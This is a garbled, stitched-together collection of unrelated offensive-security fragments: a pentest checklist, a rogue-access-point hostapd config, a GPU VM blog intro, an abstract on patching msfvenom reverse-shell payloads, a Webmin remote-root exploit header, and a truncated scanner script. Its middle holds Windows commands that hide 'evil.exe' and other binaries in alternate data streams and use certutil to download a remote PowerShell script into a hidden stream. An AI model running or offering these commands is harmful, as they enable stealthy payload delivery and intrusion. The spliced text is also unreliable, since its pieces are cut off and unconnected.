- Recon
- Find vuln
- Exploit
- Document it
Unicornscans in cli, nmap in msfconsole to help store loot in database.
interface=wlan0
# --------------------------------------
bss=wlan1
ssid=EAP
# IEEE 802.11 specifies two authentication algorithms. hostapd can be
# configured to allow both of these or only one. Open system authentication
# should be used with IEEE 802.1X.
# Bit fields of allowed authentication algorithms:
# bit 0 = Open System Authentication
In February 2017, Google announced the availability of GPU-based VMs. I spun up a few of these instances and ran some benchmarks. Along the way, I wrote down the steps taken to provision these VM instances and install the relevant drivers.
Update April 2019: Updated instructions to use instances with the Tesla T4 GPUs.
Abstract
This is a document explaining how to locate WaitForSingleObject(..., INFINITE) within msfvenom's (4.12.23-dev) generated payload and how to fix the payload's glitches. It goes through the analysis of a windows/shell_reverse_tcp payload, touching on issues like stack alignment and locating and patching WaitForSingleObject. It was written when I realised there are many topics on the Offensive-Security OSCE/CTP forums touching on the problem of finding this particular Windows API. Since RE is one of my stronger FU's, I decided to write down my explanation of the subject.
Contents:
HOST=$1;
PORT=$2;
LHOST=$3;
LPORT=$4;
if [ $# -lt 4 ]
then
    echo "Webmin <1.29 remote root exploit by oxagast"
    echo "Priv esc by directory transversal to find cookie in logfile file as root, then session highjack into RCE.";
    echo "Thanks to UmZ for directory transversal attack; greets to enki for asking me to try this!";
    echo "Usage:"
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
#!/bin/bash
# Usage : ./scanio.sh <save file>
# Example: ./scanio.sh cname_list.txt
# Premium
function ech() {
    spinner=( "|" "/" "-" "\\" )
    while true; do
        # Quote the expansion so each spinner character is used literally
        for i in "${spinner[@]}"; do
            echo -ne "\r[$i] $1"